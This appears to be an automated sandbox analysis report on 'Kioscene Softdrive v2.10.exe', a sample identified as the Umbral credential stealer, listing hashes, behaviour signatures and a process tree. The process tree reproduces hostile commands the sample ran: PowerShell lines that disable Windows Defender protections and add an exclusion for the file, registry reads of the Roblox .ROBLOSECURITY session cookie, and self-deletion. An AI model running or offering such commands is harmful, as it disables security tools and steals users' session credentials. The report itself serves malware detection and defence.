Overview

overview

10

Static

static

10

Kioscene S...10.exe

windows7-x64

10

Kioscene S...10.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    15s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    02-08-2024 15:23

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Kioscene Softdrive v2.10.exe

  • Size

    229KB

  • MD5

    18dff45f8e9eb29b0fb13e341bdd8dfc

  • SHA1

    768114e6ed8a6dab7eec0e677d53430c37e5393e

  • SHA256

    dfaadfbf1693ea477fde1a960b20280daa82e35128f537a62859bc5aeff9a948

  • SHA512

    ace88964c82470394bd18f6b1ca16fecdf3394b0900f0b375dc358bd8577828e7041c35d9bb790b9d91b062df9167963221f6c7ab62740c6f5ae1e9861c5f223

  • SSDEEP

    6144:lloZM+rIkd8g+EtXHkv/iD44lU3HdmOhOU9va6v1Nb8e1mpi:noZtL+EP84lU3HdmOhOU9va6vXj

Score
10/10
umbralcredential_accessdiscoveryexecutionspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe
    "C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1600
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2116
    • C:\Windows\system32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe"
      2⤵
      • Views/modifies file attributes
      PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2764
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2016
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2928
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1576
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2028
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:844
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:1164
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:2792
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:2992
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Kioscene Softdrive v2.10.exe" && pause
          2⤵
          • Deletes itself
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2404
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2644

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        c590bf616d5a1e677aa34fb6625416b6

        SHA1

        eac9681600e9e0d15014e13416a71bb7ae466dc7

        SHA256

        05c903c50d4ebd9befd840d3e8bc360e31ecd0dc86d317be3cf04b1fa95cd440

        SHA512

        be505e14c06b16e6b2b831a0f2eee076644b39dbef6e73fe9e570f262af6397678746f6aaf32b44b1ff3035587946539a7efbca196b141ad14da82876a385e16

        Download Submit

      • memory/1600-0-0x000007FEF6033000-0x000007FEF6034000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1600-1-0x0000000001270000-0x00000000012B0000-memory.dmp

        Filesize

        256KB

        Download

      • memory/1600-2-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/1600-47-0x000007FEF6030000-0x000007FEF6A1C000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2016-14-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2016-15-0x0000000001F00000-0x0000000001F08000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2764-7-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2764-8-0x0000000002620000-0x0000000002628000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2792-43-0x0000000001C20000-0x0000000001C28000-memory.dmp

        Filesize

        32KB

        Download